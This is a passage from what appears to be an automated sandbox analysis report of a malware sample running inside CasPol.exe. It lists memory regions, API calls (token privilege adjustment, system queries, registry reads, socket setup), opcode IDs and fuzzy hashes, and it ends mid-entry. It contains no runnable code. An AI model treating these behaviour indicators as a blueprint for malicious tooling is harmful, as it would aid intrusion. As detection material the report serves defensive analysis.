                                          • Instruction Fuzzy Hash: E0927135A002288FDB15DF74C898B9DB7F2AF89300F1585AAE50AAB361DF719D45CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$*r$*r$*r
                                          • API String ID: 0-2268267026
                                          • Opcode ID: 6e962d6e5a9f1d7c6b84878082006dc61bd95f2ece30bb11c41046d53de93290
                                          • Instruction ID: 612bf23885deb36ad61175ab924d99db7d43bf6d4a746b9d1e87eb4abdb29c63
                                          • Opcode Fuzzy Hash: 6e962d6e5a9f1d7c6b84878082006dc61bd95f2ece30bb11c41046d53de93290
                                          • Instruction Fuzzy Hash: 0B52C430A002458FEF24DFB8C994BADBBB2AF85304F24C16AD2199F396CA35DD45CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: r$ r$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or
                                          • API String ID: 0-988043974
                                          • Opcode ID: 8052b89c6b66771d7c6681e686870de6a3f30f992238be5b848946f383a288fe
                                          • Instruction ID: 664a28a7a35deacab200faa2f00a096cceed05d37dc4476553be3f5c07ef369d
                                          • Opcode Fuzzy Hash: 8052b89c6b66771d7c6681e686870de6a3f30f992238be5b848946f383a288fe
                                          • Instruction Fuzzy Hash: 69425D75A006248FDB24DFB8C8947ADB7F2AF88300F1585AAD61AEB351EB349D41CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0Xr$\Or$\Or$\Or$\Or$\Or$*r$*r$*r$*r$*r
                                          • API String ID: 0-4274820399
                                          • Opcode ID: c39bcf3550748dba41eb5e1128e7f7da545445e11d17415f8ef6ab7473c00ac7
                                          • Instruction ID: 738a7557d1afcec5c33121ca62b62c982ec06aa82959a3c4e166ecdc99503cfb
                                          • Opcode Fuzzy Hash: c39bcf3550748dba41eb5e1128e7f7da545445e11d17415f8ef6ab7473c00ac7
                                          • Instruction Fuzzy Hash: 2832A330F042048FEB24EBA8C8947AEB7B2EF95310F25846AE219EF391DA35DD45D751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Or$\Or$\Or$\Or$\Or$*r$*r
                                          • API String ID: 0-548486589
                                          • Opcode ID: e8765b6fc04f06593b7307ba12f2d7195129e4afc199a0db1dbd41f0d67778b2
                                          • Instruction ID: a47af2811b15cc38be98bbaa16bbb6e1bfcf7967287ec0ede3d22a91616af3a9
                                          • Opcode Fuzzy Hash: e8765b6fc04f06593b7307ba12f2d7195129e4afc199a0db1dbd41f0d67778b2
                                          • Instruction Fuzzy Hash: 83028D75B042559FEB08CBB8C894B5E7BF2AF89304F19806AE505AF392DA34EC45CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Or$\Or$\Or$\Or$\Or
                                          • API String ID: 0-2346101514
                                          • Opcode ID: 104e993bdd6c025e363c93d4b90ce91ed43fa232c8e9773243e0933769f6089a
                                          • Instruction ID: b793ed957f80aecf6f7da4dfe4562150d56f7651bc58040df04af4334a90d227
                                          • Opcode Fuzzy Hash: 104e993bdd6c025e363c93d4b90ce91ed43fa232c8e9773243e0933769f6089a
                                          • Instruction Fuzzy Hash: 07028C70A003149FEB14DBB9C898B6EB7F2AF85304F29852EE51A9B395DE34DC05C791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 207a60b354b48d6b0112a61d1ddcb6b77f18074a86d774b7ba8c83c0023ffea8
                                          • Instruction ID: f778e9a319162bf79f6e5ad02123de1b1cee34fbc63298612f1c70bb2dd48feb
                                          • Opcode Fuzzy Hash: 207a60b354b48d6b0112a61d1ddcb6b77f18074a86d774b7ba8c83c0023ffea8
                                          • Instruction Fuzzy Hash: EC714034A00215DFDB14DFB4C998BAEBBF2AF84311F168529E906A7394DB38DD41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1D45AAFF
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: AdjustPrivilegesToken
                                          • String ID:
                                          • API String ID: 2874748243-0
                                          • Opcode ID: 0427b5c963be8f39573eb14f37102206bca31edc78e6898001bba75521ec01d1
                                          • Instruction ID: a697c94d9ad9a9f8b188a9002c64490f8703bb4b143267aa471d954a653d6e54
                                          • Opcode Fuzzy Hash: 0427b5c963be8f39573eb14f37102206bca31edc78e6898001bba75521ec01d1
                                          • Instruction Fuzzy Hash: EA21D176509780AFDB12CF25DC41B52BFF4EF06310F0885DAE9848F263D271A808DB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1D45AAFF
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: AdjustPrivilegesToken
                                          • String ID:
                                          • API String ID: 2874748243-0
                                          • Opcode ID: 6c5b11327b01cf13e9706e1f995f88ceedb4ce87a2f58365449997127823be39
                                          • Instruction ID: 8cbc78dc1140f4c365c3bf1fa85a3b9725a3b78e2c31f92c74d8374060ecc8cc
                                          • Opcode Fuzzy Hash: 6c5b11327b01cf13e9706e1f995f88ceedb4ce87a2f58365449997127823be39
                                          • Instruction Fuzzy Hash: 5011A0755003409FEB11CF55D985B56FBE4EF08220F08C46AEE498B652D371E854DFA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtQuerySystemInformation.NTDLL ref: 1D45B015
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: InformationQuerySystem
                                          • String ID:
                                          • API String ID: 3562636166-0
                                          • Opcode ID: 8e0a8a221e9f7f72562058db96a446d059b8dbec3e96ff826b965bfe6c30f104
                                          • Instruction ID: 71411c2495b15deb3502e5707c2799fe8e2be1cc6a8c9394b1a7a7b04c0129a2
                                          • Opcode Fuzzy Hash: 8e0a8a221e9f7f72562058db96a446d059b8dbec3e96ff826b965bfe6c30f104
                                          • Instruction Fuzzy Hash: 8211A375408780AFD7128F15DC44B52FFB4EF46214F09849EED844B253D275A818CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtQuerySystemInformation.NTDLL ref: 1D45B015
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: InformationQuerySystem
                                          • String ID:
                                          • API String ID: 3562636166-0
                                          • Opcode ID: 332c373415b09629e1b0d2606dbe0fbef8b6c46c446f1fd645b8e68adf24445f
                                          • Instruction ID: 7c48a97c3fbde660ad5f7456130d4f558a0a6e49fe6db4b2b6226740778da015
                                          • Opcode Fuzzy Hash: 332c373415b09629e1b0d2606dbe0fbef8b6c46c446f1fd645b8e68adf24445f
                                          • Instruction Fuzzy Hash: 58018F354007409FEB21CF05D984B15FBA0EF08A20F08C19ADE580B352D275A819CF62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9919c65029d97047e4b36e2d6999bf38c22be10c165262e19d8265a1cf1ae69e
                                          • Instruction ID: 771da8f34343bc28f45d97def3a70fd1cfb51fe999766f82a31e9e985491cc7b
                                          • Opcode Fuzzy Hash: 9919c65029d97047e4b36e2d6999bf38c22be10c165262e19d8265a1cf1ae69e
                                          • Instruction Fuzzy Hash: 65624B34B002158FEB08DBB8C5A4BADB7F2AF88314F258569D406EB395DB39DD42CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea8d35935fea81563c588c7b0e33931bdf476385bf64eb4caa971633d890c679
                                          • Instruction ID: c2d5e0511bd64a1d41d488d83f6a91fbd566505e1af29503f843fcc44d00a781
                                          • Opcode Fuzzy Hash: ea8d35935fea81563c588c7b0e33931bdf476385bf64eb4caa971633d890c679
                                          • Instruction Fuzzy Hash: E5526034B002159FDB54DBB8C4987AE7BF2AF88310F25856AE506EB395DF34DC068B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4a75b76fbdfe27509a1e43ab71eacd62d141e959557e3ae5858a35419a7dcc09
                                          • Instruction ID: 872f4a70f82951836d8464d0fb8ac8e99d08d1355bbb318f206b068e05e7a75b
                                          • Opcode Fuzzy Hash: 4a75b76fbdfe27509a1e43ab71eacd62d141e959557e3ae5858a35419a7dcc09
                                          • Instruction Fuzzy Hash: BA025C35A402059FDB04DB68C994AAEB7F2EF89310F558529E40ADF394EB35EC42CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3946c56dbd67fc2ed4a9c2ea19922c1021b358a879126f20dd7fba215e03f538
                                          • Instruction ID: 68135c36611df4858dfbbb5031a1485bb9e62226593639e6cd098075a62d7756
                                          • Opcode Fuzzy Hash: 3946c56dbd67fc2ed4a9c2ea19922c1021b358a879126f20dd7fba215e03f538
                                          • Instruction Fuzzy Hash: 5BD1D331E043059FDB20DB68C88076ABBF2EF96314F10896BD25ACB751D631ED4AC751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: L.r$L.r
                                          • API String ID: 2994545307-3620355741
                                          • Opcode ID: 4b501cf2a1bb8800e163d68b420ebc81d9874a6f87365ae75b499a99ce30a91b
                                          • Instruction ID: 8aeac34bf7265848a50a1a7b2a0c6130bf23c10f1bd8ef7b4fb71676f2044fa4
                                          • Opcode Fuzzy Hash: 4b501cf2a1bb8800e163d68b420ebc81d9874a6f87365ae75b499a99ce30a91b
                                          • Instruction Fuzzy Hash: 24519375B002059FDB14DBB8D884BAEB7B5EF88304F20853AE61ADB294DB34EC45C751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: L.r$L.r
                                          • API String ID: 2994545307-3620355741
                                          • Opcode ID: dd6ac9ebbc4745aaaae0f10a270ef2ad4883015bd8ebb92cab47cebd61e7ec37
                                          • Instruction ID: 8ae5613117d117f10bcb66ef8777ceeeb361a4303950944b8d31c71edb5ed013
                                          • Opcode Fuzzy Hash: dd6ac9ebbc4745aaaae0f10a270ef2ad4883015bd8ebb92cab47cebd61e7ec37
                                          • Instruction Fuzzy Hash: 45518575B002059FDB04EBB4C884AAEB7F6AF88304B258539E606DB394DF34ED45C761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Or$\Or$\Or
                                          • API String ID: 0-1528748740
                                          • Opcode ID: 9589706d180604f49aba61477f4a2d1c1842d35cb94f8898dfe930cbb1d65cf8
                                          • Instruction ID: c3704ce3db09c6f09d6791334d1f6a79c5bd2ebe31ac7e738cd0840f4c1abca7
                                          • Opcode Fuzzy Hash: 9589706d180604f49aba61477f4a2d1c1842d35cb94f8898dfe930cbb1d65cf8
                                          • Instruction Fuzzy Hash: 0542D5347083859FE712DB68D858B697BF2AF86300F19C4EAD448DF2A2DA34DD4AC751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • KiUserExceptionDispatcher.NTDLL ref: 1F822C16
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID: DispatcherExceptionUser
                                          • String ID:
                                          • API String ID: 6842923-0
                                          • Opcode ID: bd0bdb1921146d125b28649cccfe401d1d9d8bcfa878377540bbcfb369543229
                                          • Instruction ID: 5adf02a9b231346d7047b33ecdcc6f4c63f932aa786cc082e1d5dfa816c52465
                                          • Opcode Fuzzy Hash: bd0bdb1921146d125b28649cccfe401d1d9d8bcfa878377540bbcfb369543229
                                          • Instruction Fuzzy Hash: B8422678A45268CFDBA1DF68C898A99BBF5FF48711F1081D6A80DA7314DA319EC1CF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • KiUserExceptionDispatcher.NTDLL ref: 1F822C16
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID: DispatcherExceptionUser
                                          • String ID:
                                          • API String ID: 6842923-0
                                          • Opcode ID: ec623b3d89d506f7cfce53f8eb861420a338061f53000ab993c2efa52141fe0c
                                          • Instruction ID: 5d9c3d10802fb753ef41636c973deadfb8af68df1e4e064eb4877cd7167cc827
                                          • Opcode Fuzzy Hash: ec623b3d89d506f7cfce53f8eb861420a338061f53000ab993c2efa52141fe0c
                                          • Instruction Fuzzy Hash: D9422678A45268CFDBA1DB68C898A99BBF5FF48711F1081D6E80DA7314DA709EC1CF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • KiUserExceptionDispatcher.NTDLL ref: 1F822C16
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID: DispatcherExceptionUser
                                          • String ID:
                                          • API String ID: 6842923-0
                                          • Opcode ID: 30f608bcdf07588eb3211963afef1237894feb0f4b2799120ea9170aad807b77
                                          • Instruction ID: fbdb1fd53711479b929a68e2f677fabd3b8da23ee73702de0379fda1807cfe0f
                                          • Opcode Fuzzy Hash: 30f608bcdf07588eb3211963afef1237894feb0f4b2799120ea9170aad807b77
                                          • Instruction Fuzzy Hash: B5421678A45268CFDBA1DB68C898A99BBF5FF48711F1081D6A80DA7314DA319EC1CF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • KiUserExceptionDispatcher.NTDLL ref: 1F822C16
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID: DispatcherExceptionUser
                                          • String ID:
                                          • API String ID: 6842923-0
                                          • Opcode ID: 422ff410029ce95edf7f860f529e2aa7bc0cefc981483df512d1b5d1d1336679
                                          • Instruction ID: 1aedbc5c76c5b2c6f9255cfb36a32263e9a2fdcd6d2a9327a3b9d5556faa5ec4
                                          • Opcode Fuzzy Hash: 422ff410029ce95edf7f860f529e2aa7bc0cefc981483df512d1b5d1d1336679
                                          • Instruction Fuzzy Hash: CE321678A45268CFDBA1DB68C898A99BBF5FF48711F1081D6A80DA7314DA319EC1CF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • KiUserExceptionDispatcher.NTDLL ref: 1F822C16
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID: DispatcherExceptionUser
                                          • String ID:
                                          • API String ID: 6842923-0
                                          • Opcode ID: cadd9a4e68f5d712cbca0de215227bf79b53ff86f4cede955462a258dd82824f
                                          • Instruction ID: 7771147f1298ed5adf0f44db0d18695fd6e89707752578e42fdec46474135d1d
                                          • Opcode Fuzzy Hash: cadd9a4e68f5d712cbca0de215227bf79b53ff86f4cede955462a258dd82824f
                                          • Instruction Fuzzy Hash: D4321678A45268CFDBA1DB68C898A99BBF5FF48711F1081D6A80DA7314DA319EC1CF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • KiUserExceptionDispatcher.NTDLL ref: 1F822C16
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID: DispatcherExceptionUser
                                          • String ID:
                                          • API String ID: 6842923-0
                                          • Opcode ID: 11ec8a5e68848bec1af961fc61ae0b45b7d7795fbce4ab6d4fd6376506384ea9
                                          • Instruction ID: 87cda498b49b34b41c226e341bfa478d8ff67183cd9b4728a7cb856e3ca47866
                                          • Opcode Fuzzy Hash: 11ec8a5e68848bec1af961fc61ae0b45b7d7795fbce4ab6d4fd6376506384ea9
                                          • Instruction Fuzzy Hash: F9321678A45268CFDBA1DB68C898A99BBF5FF48711F1081D6A80DA7314DB319EC1CF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • KiUserExceptionDispatcher.NTDLL ref: 1F822C16
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID: DispatcherExceptionUser
                                          • String ID:
                                          • API String ID: 6842923-0
                                          • Opcode ID: 4343a7c9e454a3f825b5e6f6dd4feb389244236a314fae822e3ed3f82072a303
                                          • Instruction ID: 0158eb10a2872f563c6f6c2e5871e1cbd2537d4480feee11169ecf24d4d6bcc6
                                          • Opcode Fuzzy Hash: 4343a7c9e454a3f825b5e6f6dd4feb389244236a314fae822e3ed3f82072a303
                                          • Instruction Fuzzy Hash: 74321578A45268CFDBA1DB68C898A99BBF5FF48711F1081D6A80DA7314DA319E81CF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5874e8c19ed5f96c9b081c4d62b7468342e099ec30ea9f1812e863a523d9d2a7
                                          • Instruction ID: 7f9b16831f3924bfb430027928e3f6b44c5e66bb271ebd6756e1788f459a469e
                                          • Opcode Fuzzy Hash: 5874e8c19ed5f96c9b081c4d62b7468342e099ec30ea9f1812e863a523d9d2a7
                                          • Instruction Fuzzy Hash: 8241AC31A00258DFDB14DFA8C894A9EBBF1EF49311F1184AAD505EB390EB39DC46CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1FE32B45
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: e69086f8a2731ddb701d4d44832a51a17363dd370cd3044b61473d215efe6c17
                                          • Instruction ID: 6e188032d6b1ab1ebdf8dae4a52a1cf936dd1377c575662629c76b87d36dd93b
                                          • Opcode Fuzzy Hash: e69086f8a2731ddb701d4d44832a51a17363dd370cd3044b61473d215efe6c17
                                          • Instruction Fuzzy Hash: 363181B2504384AFE7128F65DC44FA6BBACEF45710F0489AAE9859F142D274E909CB71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • getaddrinfo.WS2_32(?,00000EA4), ref: 1FE334B3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: getaddrinfo
                                          • String ID:
                                          • API String ID: 300660673-0
                                          • Opcode ID: a32bd1780021b167318c168d612ca5599f5ebd980239c703af0dcfe78abc0654
                                          • Instruction ID: e2dc73ec4c50611dcb0392ee022aa67468345f6ef5a95b6614b87eddb629637f
                                          • Opcode Fuzzy Hash: a32bd1780021b167318c168d612ca5599f5ebd980239c703af0dcfe78abc0654
                                          • Instruction Fuzzy Hash: 1531A3B1404384AFF722CB64CC85FA6FBBCEF06310F04859AF9849F182D275A549CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WSASocketW.WS2_32(?,?,?,?,?), ref: 1FE319B6
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Socket
                                          • String ID:
                                          • API String ID: 38366605-0
                                          • Opcode ID: 0873215645497e88313b005f6bb16a21d9c046cfd7a9ba158700abf2c572ae86
                                          • Instruction ID: 855577cfb79002fd01684357fb19ab37e3910da89aac936c0c8a6e559c0f6145
                                          • Opcode Fuzzy Hash: 0873215645497e88313b005f6bb16a21d9c046cfd7a9ba158700abf2c572ae86
                                          • Instruction Fuzzy Hash: 113183718093C0AFE7138F65DC45B56BFB4EF06214F0885DFE9858F1A3D269A908CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegQueryValueExW.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE31580
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          • Opcode ID: 5d28ee96412c80f4a2624ebbf5f3bfa8cccfddb290c17bd43b3d22549a416ba3
                                          • Instruction ID: e0a4727f9e7d7c3174d38dc8754677e3566acadba7f04db855cfee35d0806bc1
                                          • Opcode Fuzzy Hash: 5d28ee96412c80f4a2624ebbf5f3bfa8cccfddb290c17bd43b3d22549a416ba3
                                          • Instruction Fuzzy Hash: 49319572509380AFE712CF60DC84F96BFB8EF46310F08859AE9859F193D265E508CB71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1FE32D3A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: c6bdfd616cc0fa86e6d2fd840ca77c90718bf51048674e0225103d4771775c65
                                          • Instruction ID: 741a59f6f76328095567c14b1be5cc61824f86fc39f3d2bed88babbe53a69f2d
                                          • Opcode Fuzzy Hash: c6bdfd616cc0fa86e6d2fd840ca77c90718bf51048674e0225103d4771775c65
                                          • Instruction Fuzzy Hash: 97319FB2509784AFE7128B64DC45F66FFB8EF46310F08849AED849F253D225A909C772
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WSAIoctl.WS2_32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE326C1
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Ioctl
                                          • String ID:
                                          • API String ID: 3041054344-0
                                          • Opcode ID: dd5bfa92747f7bb002359a382844a23c4e5530be245e12cf96649c5d4288d927
